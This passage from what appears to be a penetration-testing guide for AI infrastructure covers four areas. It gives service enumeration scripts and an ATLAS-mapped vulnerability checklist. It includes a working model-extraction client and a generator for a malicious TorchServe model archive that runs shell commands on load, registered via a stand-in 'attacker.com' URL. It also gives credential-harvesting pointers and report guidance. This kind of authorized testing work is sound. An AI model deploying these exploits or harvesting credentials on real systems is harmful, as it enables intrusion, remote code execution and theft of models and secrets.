    # Generic HTTP fingerprint
    RESP=$(curl -s --connect-timeout 3 -D - "http://${TARGET}:${port}/" 2>/dev/null | head -20)
    if [ -n "$RESP" ]; then
        echo "$RESP" | grep -iE "server:|x-powered|content-type" || true
    fi
 
    # Try AI-specific endpoints
    for path in "/v2" "/models" "/v1/models" "/api/2.0/mlflow/experiments/list" "/api/sessions" "/health"; do
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" \
            --connect-timeout 3 "http://${TARGET}:${port}${path}" 2>/dev/null)
        if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "401" ]; then
            echo "  ${path} -> HTTP ${HTTP_CODE}"
        fi
    done
    echo ""
done
 
echo "--- Model API Probing ---"
# Test for OpenAI-compatible API (vLLM, LiteLLM, etc.)
MODELS_RESP=$(curl -s --connect-timeout 3 "http://${TARGET}:8000/v1/models" 2>/dev/null)
if echo "$MODELS_RESP" | python3 -c "import sys,json; json.load(sys.stdin)" 2>/dev/null; then
    echo "OpenAI-compatible API found on port 8000:"
    echo "$MODELS_RESP" | python3 -m json.tool 2>/dev/null
fi
 
echo ""
echo "=== Enumeration Complete ==="
echo "Results saved to ai_ports_${TARGET}.txt"

Phase 2: Vulnerability Assessment

AI-Specific Vulnerability Checklist

Map discovered services to known vulnerability patterns using MITRE ATLAS techniques:

ATLAS Technique	Infrastructure Target	Test Method
AML.T0024 - Exfiltration via ML Inference API	Model serving endpoints	Query model to extract training data or model architecture
AML.T0020 - Poison Training Data	Data storage, pipelines	Test write access to training data locations
AML.T0010 - ML Supply Chain Compromise	Model registries, package repos	Check for unsigned models, vulnerable dependencies
AML.T0043 - Craft Adversarial Data	Inference endpoints	Submit adversarial inputs to test model robustness
AML.T0048 - Resource Hijacking	GPU schedulers, compute nodes	Test for unauthorized compute access

"""
AI infrastructure vulnerability assessment engine.
Maps discovered services to known vulnerability patterns
and generates a prioritized testing plan.
"""
 
import json
from dataclasses import dataclass, field
from typing import Optional
from enum import Enum
 
class RiskLevel(Enum):
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"
 
@dataclass
class VulnerabilityCheck:
    """A single vulnerability check to perform."""
    check_id: str
    name: str
    atlas_technique: str
    risk_level: RiskLevel
    target_service: str
    description: str
    test_procedure: str
    remediation: str
 
# Vulnerability check database for AI infrastructure
AI_VULN_CHECKS = [
    VulnerabilityCheck(
        check_id="AI-SERVE-001",
        name="Unauthenticated Model Management API",
        atlas_technique="AML.T0010",
        risk_level=RiskLevel.CRITICAL,
        target_service="TorchServe",
        description=(
            "TorchServe management API (port 8081) allows model "
            "registration, which executes arbitrary Python code."
        ),
        test_procedure=(
            "1. Attempt GET /models on port 8081\n"
            "2. If accessible, attempt POST /models with a test URL\n"
            "3. Check for SSRF by using internal URLs"
        ),
        remediation=(
            "Bind management API to localhost. Use network policies "
            "to restrict access. Upgrade to >= 0.8.2."
        ),
    ),
    VulnerabilityCheck(
        check_id="AI-SERVE-002",
        name="Model Information Disclosure",
        atlas_technique="AML.T0024",
        risk_level=RiskLevel.MEDIUM,
        target_service="Triton/vLLM/TorchServe",
        description=(
            "Model metadata endpoints expose architecture details, "
            "input/output shapes, and version information."
        ),
        test_procedure=(
            "1. Query /v2/models/<name>/config (Triton)\n"
            "2. Query /v1/models (vLLM)\n"
            "3. Query /models/<name> (TorchServe)\n"
            "4. Document exposed information"
        ),
        remediation=(
            "Restrict metadata endpoints to authenticated clients. "
            "Remove unnecessary model configuration details."
        ),
    ),
    VulnerabilityCheck(
        check_id="AI-DATA-001",
        name="Training Data Storage Public Access",
        atlas_technique="AML.T0020",
        risk_level=RiskLevel.CRITICAL,
        target_service="S3/GCS/Azure Blob",
        description=(
            "Training data in publicly accessible cloud storage "
            "can be read or modified by anyone."
        ),
        test_procedure=(
            "1. Enumerate bucket names using naming conventions\n"
            "2. Test each for public listing (GET /)\n"
            "3. Test for public object access\n"
            "4. Test for public write access"
        ),
        remediation=(
            "Enable Block Public Access at account level. "
            "Enable versioning and Object Lock."
        ),
    ),
    VulnerabilityCheck(
        check_id="AI-PIPE-001",
        name="Unauthenticated Pipeline Orchestrator",
        atlas_technique="AML.T0010",
        risk_level=RiskLevel.CRITICAL,
        target_service="Kubeflow/Airflow",
        description=(
            "Pipeline orchestrators without authentication allow "
            "submission of arbitrary pipeline runs."
        ),
        test_procedure=(
            "1. Access Kubeflow dashboard (port 8443)\n"
            "2. Attempt to create a pipeline run\n"
            "3. Check Airflow webserver (port 8080) for auth\n"
            "4. Test Airflow REST API"
        ),
        remediation=(
            "Enable authentication (OIDC for Kubeflow, "
            "RBAC for Airflow). Use network policies."
        ),
    ),
    VulnerabilityCheck(
        check_id="AI-GPU-001",
        name="GPU Memory Cross-Tenant Leakage",
        atlas_technique="AML.T0024",
        risk_level=RiskLevel.HIGH,
        target_service="GPU Clusters",
        description=(
            "GPU memory may not be cleared between job allocations, "
            "allowing one tenant to read another's model weights or data."
        ),
        test_procedure=(
            "1. Run a GPU job that writes known patterns to GPU memory\n"
            "2. Release the GPU allocation\n"
            "3. Run another job on the same GPU\n"
            "4. Read GPU memory for residual patterns"
        ),
        remediation=(
            "Enable NVIDIA MPS/MIG for isolation. Use CUDA_VISIBLE_DEVICES. "
            "Clear GPU memory between allocations in the scheduler."
        ),
    ),
]
 
class VulnerabilityAssessment:
    """
    Manage and execute AI infrastructure vulnerability assessments.
    """
 
    def __init__(self):
        self.checks = AI_VULN_CHECKS
        self.results: list[dict] = []
 
    def get_applicable_checks(
        self, discovered_services: list[str],
    ) -> list[VulnerabilityCheck]:
        """
        Filter vulnerability checks to those applicable
        to discovered services.
        """
        applicable = []
        for check in self.checks:
            target_lower = check.target_service.lower()
            for service in discovered_services:
                service_lower = service.lower()
                # Match if any part of the target matches a discovered service
                targets = target_lower.split("/")
                if any(t in service_lower for t in targets):
                    applicable.append(check)
                    break
        return applicable
 
    def generate_test_plan(
        self, discovered_services: list[str],
    ) -> str:
        """Generate a prioritized test plan based on discovered services."""
        applicable = self.get_applicable_checks(discovered_services)
 
        # Sort by risk level
        risk_order = {
            RiskLevel.CRITICAL: 0,
            RiskLevel.HIGH: 1,
            RiskLevel.MEDIUM: 2,
            RiskLevel.LOW: 3,
            RiskLevel.INFO: 4,
        }
        applicable.sort(key=lambda c: risk_order[c.risk_level])
 
        plan = {
            "total_checks": len(applicable),
            "by_risk": {},
            "checks": [],
        }
 
        for check in applicable:
            risk = check.risk_level.value
            plan["by_risk"][risk] = plan["by_risk"].get(risk, 0) + 1
            plan["checks"].append({
                "id": check.check_id,
                "name": check.name,
                "risk": risk,
                "atlas": check.atlas_technique,
                "target": check.target_service,
                "procedure": check.test_procedure,
            })
 
        return json.dumps(plan, indent=2)

Phase 3: Exploitation

Model Theft via Inference API

"""
Model extraction attack demonstration for penetration testing.
Queries a target model API systematically to collect input-output
pairs for training a surrogate model.
 
WARNING: For authorized penetration testing only.
"""
 
import requests
import numpy as np
import json
import time
from typing import Optional
from pathlib import Path
 
class ModelExtractionAttack:
    """
    Extract a target model's behavior through API queries.
    Uses active learning to minimize the number of queries needed.
    """
 
    def __init__(
        self,
        target_url: str,
        model_name: str = "default",
        rate_limit: float = 0.1,  # seconds between requests
    ):
        self.target_url = target_url.rstrip("/")
        self.model_name = model_name
        self.rate_limit = rate_limit
        self.query_count = 0
        self.collected_pairs: list[dict] = []
 
    def query_model(
        self,
        input_data: dict,
        timeout: int = 30,
    ) -> Optional[dict]:
        """Send a single query to the target model."""
        try:
            resp = requests.post(
                f"{self.target_url}/v1/completions",
                json={
                    "model": self.model_name,
                    "prompt": input_data.get("prompt", ""),
                    "max_tokens": input_data.get("max_tokens", 100),
                    "temperature": 0.0,  # Deterministic for extraction
                    "logprobs": 5,  # Request logprobs if available
                },
                timeout=timeout,
            )
            self.query_count += 1
 
            if resp.status_code == 200:
                return resp.json()
            elif resp.status_code == 429:
                # Rate limited — back off
                time.sleep(5)
                return None
            else:
                return None
 
        except requests.RequestException:
            return None
 
    def generate_extraction_queries(
        self,
        domain: str = "general",
        num_queries: int = 1000,
    ) -> list[dict]:
        """
        Generate a diverse set of queries designed to map the
        model's behavior across its input space.
        """
        queries = []
 
        # Strategy 1: Systematic prompt variations
        base_prompts = [
            "The capital of {} is",
            "Translate to French: {}",
            "Summarize: {}",
            "The opposite of {} is",
            "Define the word: {}",
        ]
 
        # Strategy 2: Length-varied inputs to map context window behavior
        for length in [10, 50, 100, 500]:
            queries.append({
                "prompt": "word " * length,
                "max_tokens": 50,
                "strategy": "length_probe",
            })
 
        # Strategy 3: Special token probing
        special_tokens = [
            "<|endoftext|>", "[INST]", "<<SYS>>",
            "<s>", "</s>", "[PAD]",
        ]
        for token in special_tokens:
            queries.append({
                "prompt": f"Repeat: {token}",
                "max_tokens": 50,
                "strategy": "token_probe",
            })
 
        return queries[:num_queries]
 
    def run_extraction(
        self,
        num_queries: int = 100,
        output_path: str = "extraction_results.jsonl",
    ) -> dict:
        """
        Execute the model extraction attack.
        Collects input-output pairs for surrogate model training.
        """
        queries = self.generate_extraction_queries(num_queries=num_queries)
 
        with open(output_path, "w") as f:
            for i, query in enumerate(queries):
                result = self.query_model(query)
                if result:
                    pair = {
                        "input": query,
                        "output": result,
                        "query_num": i,
                    }
                    f.write(json.dumps(pair) + "\n")
                    self.collected_pairs.append(pair)
 
                time.sleep(self.rate_limit)
 
                if (i + 1) % 100 == 0:
                    print(
                        f"Progress: {i + 1}/{len(queries)} queries, "
                        f"{len(self.collected_pairs)} successful"
                    )
 
        return {
            "total_queries": self.query_count,
            "successful_pairs": len(self.collected_pairs),
            "output_file": output_path,
        }

Pipeline Exploitation: Arbitrary Code via Model Registration

"""
Generate a proof-of-concept malicious model archive for TorchServe.
The model handler executes a benign command to demonstrate RCE
capability without causing harm.
 
WARNING: For authorized penetration testing only.
"""
 
import os
import zipfile
import json
import tempfile
from pathlib import Path
 
def create_poc_torchserve_handler(command: str = "id") -> str:
    """
    Create a TorchServe handler that executes a command
    when the model is loaded or when inference is called.
    """
    handler_code = f'''
import subprocess
import logging
from ts.torch_handler.base_handler import BaseHandler
 
logger = logging.getLogger(__name__)
 
class PoCHandler(BaseHandler):
    """
    Proof of concept handler that demonstrates code execution
    during model initialization (load-time RCE).
    """
 
    def initialize(self, context):
        """Called when the model is loaded. Executes the PoC command."""
        logger.info("PoC handler initialized")
        # Execute benign command to prove RCE capability
        try:
            result = subprocess.run(
                ["{command}"],
                capture_output=True, text=True, timeout=5, shell=True,
            )
            logger.info(f"PoC output: {{result.stdout}}")
            # Write proof to a known location
            with open("/tmp/pentest_poc_output.txt", "w") as f:
                f.write(f"Command: {command}\\n")
                f.write(f"Output: {{result.stdout}}\\n")
                f.write(f"PoC successful - RCE demonstrated\\n")
        except Exception as e:
            logger.error(f"PoC failed: {{e}}")
 
        # Initialize a minimal model so inference still works
        self.initialized = True
 
    def handle(self, data, context):
        """Handle inference requests."""
        return ["PoC model loaded successfully"]
'''
    return handler_code
 
def create_mar_archive(
    output_path: str,
    model_name: str = "security_test",
    command: str = "id && hostname && whoami",
) -> str:
    """
    Create a .mar (Model ARchive) file for TorchServe
    containing the proof-of-concept handler.
    """
    with tempfile.TemporaryDirectory() as tmpdir:
        # Create handler file
        handler_path = os.path.join(tmpdir, "handler.py")
        with open(handler_path, "w") as f:
            f.write(create_poc_torchserve_handler(command))
 
        # Create a minimal model file (required by .mar format)
        model_path = os.path.join(tmpdir, "model.pt")
        with open(model_path, "wb") as f:
            f.write(b"PLACEHOLDER")  # Minimal content
 
        # Create MAR-INFO file
        manifest = {
            "createdOn": "2026-03-21",
            "runtime": "python",
            "model": {
                "modelName": model_name,
                "handler": "handler.py",
            },
        }
        manifest_path = os.path.join(tmpdir, "MAR-INF/MANIFEST.json")
        os.makedirs(os.path.dirname(manifest_path), exist_ok=True)
        with open(manifest_path, "w") as f:
            json.dump(manifest, f)
 
        # Package into ZIP (.mar is a ZIP file)
        mar_path = output_path if output_path.endswith(".mar") else f"{output_path}.mar"
        with zipfile.ZipFile(mar_path, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.write(handler_path, "handler.py")
            zf.write(model_path, "model.pt")
            zf.write(manifest_path, "MAR-INF/MANIFEST.json")
 
    return mar_path
 
if __name__ == "__main__":
    import sys
    output = sys.argv[1] if len(sys.argv) > 1 else "security_test.mar"
    mar_file = create_mar_archive(output)
    print(f"PoC .mar archive created: {mar_file}")
    print(f"Register with: curl -X POST 'http://target:8081/models?"
          f"url=http://attacker.com/{os.path.basename(mar_file)}'")

Credential Harvesting from AI Infrastructure

AI infrastructure is a rich target for credential harvesting because:

Training jobs often have IAM roles with access to data lakes, model registries, and cloud services
Jupyter notebooks frequently contain inline AWS keys, database passwords, and API tokens
MLflow and experiment tracking systems store artifact locations that reveal cloud storage paths
Environment variables in containerized AI services often contain secrets

During penetration testing, focus on these credential sources:

Kubernetes secrets in AI namespaces (check for base64-encoded credentials in mounted volumes)
Environment variables in GPU pod specifications
Jupyter notebook content (search for API_KEY, SECRET, PASSWORD, connection strings)
MLflow artifact URIs (reveal S3/GCS bucket paths and potentially access keys)
Docker image layers (credentials baked into container images during build)

Phase 4: Reporting

AI penetration test reports should include standard penetration testing sections plus AI-specific risk assessments. Key additions:

Model theft risk assessment: Quantify how many queries would be needed to extract a functionally equivalent model, and whether rate limiting is sufficient to prevent this.
Data poisoning impact assessment: If write access to training data was achieved, describe the potential impact on model behavior.
MITRE ATLAS mapping: Map all findings to ATLAS techniques for consistent communication.
AI regulatory compliance: Note findings relevant to the EU AI Act, NIST AI RMF, or industry-specific AI regulations.

Report Template Structure

A well-structured AI penetration test report should follow this outline:

Executive Summary: Business impact of findings, overall risk posture, comparison with industry benchmarks.
Scope and Methodology: Components tested, testing approach (black-box, grey-box, white-box), time frame, tools used, ATLAS techniques covered.
Findings Summary Table: Each finding with severity, ATLAS mapping, affected component, and remediation status.
Detailed Findings: For each finding:
- Description and technical detail
- Steps to reproduce
- Evidence (screenshots, logs, captured data)
- ATLAS technique mapping
- Business impact assessment
- Remediation recommendation with priority
AI-Specific Risk Assessment:
- Model theft feasibility analysis (estimated queries needed, current rate limiting effectiveness)
- Data poisoning vector analysis (which training data stores are writable, what controls exist)
- Inference manipulation risk (can inputs be crafted to produce attacker-desired outputs)
- Supply chain risk (model dependencies, unsigned artifacts, unverified packages)
Remediation Roadmap: Prioritized list of remediations with effort estimates and suggested timelines.

Defense and Mitigation

Adopt MITRE ATLAS as a framework: Use ATLAS to systematically assess coverage of AI attack techniques and prioritize defenses based on organizational risk.

Regular testing cadence: AI systems change rapidly as models are updated and pipelines evolve. Quarterly penetration testing or continuous red teaming is more appropriate than annual assessments.

References

MITRE. (2024). "ATLAS: Adversarial Threat Landscape for AI Systems." https://atlas.mitre.org/
OWASP. (2025). "OWASP Machine Learning Security Top 10." https://owasp.org/www-project-machine-learning-security-top-10/
NIST. (2023). "AI Risk Management Framework (AI RMF 1.0)." https://airc.nist.gov/AI_RMF_Interactivity/
Penetration Testing Execution Standard (PTES). http://www.pentest-standard.org/
European Union. (2024). "EU AI Act." Regulation laying down harmonized rules on artificial intelligence. https://artificialintelligenceact.eu/
Grosse, K., et al. (2023). "Machine Learning Security: Threats, Countermeasures, and Evaluations." IEEE Access. https://ieeexplore.ieee.org/

Edit this page on GitHub

Penetration Testing Methodology for AI Infrastructure

Related articles

Penetration Testing Methodology for AI Infrastructure

Related articles